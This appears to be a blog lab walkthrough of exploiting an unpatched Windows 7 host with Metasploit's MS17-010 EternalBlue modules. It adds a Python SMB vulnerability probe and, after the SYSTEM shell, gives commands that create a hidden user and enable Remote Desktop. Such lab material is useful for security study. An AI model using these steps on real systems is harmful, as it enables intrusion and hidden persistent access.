2019-9-27: Penetration testing, first exposure to metasploit-framework

First use of the Metasploit exploit framework: break into a Windows 7 host and obtain system privileges

Target system: Windows 7, unpatched

Target IP address: 192.168.20.131

Task: use the MS17-010 (EternalBlue) vulnerability to gain control of the target system

1. Before using Metasploit, the PostgreSQL database has to be running (msfconsole stores its module cache and workspace data in it). Start it with the command service postgresql start.

2. Enter the command msfconsole to start Metasploit. Once the msf5 prompt appears, it has finished loading.
3. First find the modules to use: enter the command search ms17-010, which lists the scanner module and the exploit module for this vulnerability.

The output shows two modules:

auxiliary/scanner/smb/smb_ms17_010: the scanner module that checks whether a host has the MS17-010 vulnerability

exploit/windows/smb/ms17_010_eternalblue: the exploit module that actually attacks it

4. With the module paths known, the real work starts: enter use auxiliary/scanner/smb/smb_ms17_010 to load the scanner module.

5. Inside the scanner module, enter show options to list the parameters that have to be set.

6. Set the parameters: enter set rhosts 192.168.20.131 to point the scan at the target host.

7. Enter run (exploit also works for auxiliary modules). The scanner reports whether the target host appears vulnerable and can be exploited.

8. Since the host is confirmed vulnerable, go straight for it: enter use exploit/windows/smb/ms17_010_eternalblue to load the EternalBlue exploit module, then set rhosts 192.168.20.131 to set the target host (rhosts is the target, not the attacking machine).

9. Enter exploit to launch the attack. It succeeds and drops straight into a shell running as NT AUTHORITY\SYSTEM, so no further privilege escalation is needed.

10. With a shell on the box you can of course do whatever you like, for example:

net user username$ /add, add a hidden user (the trailing $ keeps the account out of the output of net user; it is still visible in Computer Management and in the SAM)

net user username$ password, set the hidden user's password

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f, enable Remote Desktop on port 3389 (the Windows Firewall may still block the port unless its Remote Desktop rule is enabled as well)
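As an added example (not part of the original post, and not the Metasploit module's own code), here is the check that steps 4 to 7 perform, written as a small Python SMB1 probe: negotiate SMB1, open a null session, connect to IPC$, then send a PeekNamedPipe transaction on file handle 0. An unpatched host answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), which is what the scanner module reports as vulnerable; a patched host answers STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED. The default target 192.168.20.131, the PID constant and the native OS strings are placeholders chosen for this example.

```python
"""Added example: raw SMB1 probe for MS17-010 (the smb_ms17_010 scanner's check).
Only run it against hosts you are authorised to test."""
import socket
import struct
import sys

SMB_MAGIC = b"\xffSMB"
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched: MS17-010 present
STATUS_INVALID_HANDLE = 0xC0000008            # patched
STATUS_ACCESS_DENIED = 0xC0000022             # patched
PID = 0x1234                                  # arbitrary client process id (placeholder)


def netbios(smb):
    """Prefix an SMB message with the 4-byte NetBIOS session header."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def smb_header(command, status=0, tid=0, uid=0, mid=1):
    """32-byte SMB1 header. Flags 0x18 = canonical paths, case-insensitive.
    Flags2 0x4001 = NT status codes + long names (no Unicode, no extended security)."""
    return (SMB_MAGIC + struct.pack("<BIBHH", command, status, 0x18, 0x4001, 0)
            + b"\x00" * 8 + b"\x00\x00" + struct.pack("<HHHH", tid, PID, uid, mid))


def negotiate_request():
    """SMB_COM_NEGOTIATE offering only the NT LM 0.12 dialect."""
    dialects = b"\x02NT LM 0.12\x00"
    return smb_header(0x72) + b"\x00" + struct.pack("<H", len(dialects)) + dialects


def session_setup_request():
    """Session Setup AndX with empty passwords and an empty account: a null session."""
    # AndX none, reserved, AndX offset, MaxBuffer, MaxMpx, VcNumber, SessionKey,
    # OEM pw len, Unicode pw len, reserved, capabilities (NT_SMBS | NT_STATUS)
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 2, 0, 0, 0, 0, 0, 0x50)
    # account "", domain "", then native OS / LAN manager strings (placeholders)
    data = b"\x00\x00" + b"Windows 2000 2195\x00" + b"Windows 2000 5.0\x00"
    return smb_header(0x73) + b"\x0d" + words + struct.pack("<H", len(data)) + data


def tree_connect_request(host, uid):
    """Tree Connect AndX to the IPC$ share with a one-byte empty password."""
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00" + b"?????\x00"
    return smb_header(0x75, uid=uid) + b"\x04" + words + struct.pack("<H", len(data)) + data


def peek_named_pipe_request(tid, uid, fid=0):
    """SMB_COM_TRANSACTION carrying the PeekNamedPipe (0x23) subcommand on FID 0."""
    name = b"\\PIPE\\\x00"
    offset = 32 + 1 + 32 + 2 + len(name)   # parameters/data would start right after the name
    words = struct.pack("<HHHHBBHIHHHHHBBHH",
                        0, 0,                  # TotalParameterCount, TotalDataCount
                        0xFFFF, 0xFFFF, 0, 0,  # MaxParameterCount, MaxDataCount, MaxSetupCount, rsvd
                        0, 0, 0,               # Flags, Timeout, reserved
                        0, offset, 0, offset,  # ParameterCount/Offset, DataCount/Offset
                        2, 0, 0x23, fid)       # SetupCount, reserved, Setup[0]=PeekNamedPipe, Setup[1]=FID
    return smb_header(0x25, tid=tid, uid=uid) + b"\x10" + words + struct.pack("<H", len(name)) + name


def nt_status(packet):
    """NT status field of a raw SMB1 response (NetBIOS header included)."""
    smb = packet[4:]
    if len(smb) < 32 or smb[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 response")
    return struct.unpack_from("<I", smb, 5)[0]


def classify(status):
    """Map the PeekNamedPipe status to the same verdict the scanner gives."""
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "PATCHED"
    return "UNKNOWN (0x%08X)" % status


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed by target")
        buf += chunk
    return buf


def probe(host, port=445, timeout=5.0):
    """Run the four-message exchange and return the NT status of the PeekNamedPipe reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        def exchange(smb):
            sock.sendall(netbios(smb))
            head = recv_exact(sock, 4)
            return head + recv_exact(sock, int.from_bytes(head[1:], "big"))
        if nt_status(exchange(negotiate_request())) != 0:
            raise RuntimeError("SMB1 negotiate rejected (SMBv1 disabled?)")
        setup = exchange(session_setup_request())
        if nt_status(setup) != 0:
            raise RuntimeError("null session refused: 0x%08X" % nt_status(setup))
        uid = struct.unpack_from("<H", setup, 4 + 28)[0]      # UID lives at header offset 28
        tree = exchange(tree_connect_request(host, uid))
        if nt_status(tree) != 0:
            raise RuntimeError("IPC$ tree connect refused: 0x%08X" % nt_status(tree))
        tid = struct.unpack_from("<H", tree, 4 + 24)[0]       # TID lives at header offset 24
        return nt_status(exchange(peek_named_pipe_request(tid, uid)))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.20.131"
    print(target, classify(probe(target)))
```

Usage: python3 probe.py 192.168.20.131. The probe only speaks SMBv1, so on a host where SMBv1 has been disabled the negotiate step fails and the script reports that rather than a verdict; the same host would also show up as not vulnerable in the scanner module. A null session to IPC$ is required for the check, which Windows 7 allows by default.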

11. Summary

metasploit-framework really is an essential tool for network penetration testing: it provides a large library of ready-to-use exploit modules for common vulnerabilities, which saves testers a great deal of time. It is excellent, and penetration testers should make sure they are proficient with it.

Finish


Source: www.cnblogs.com/sym945/p/11599845.html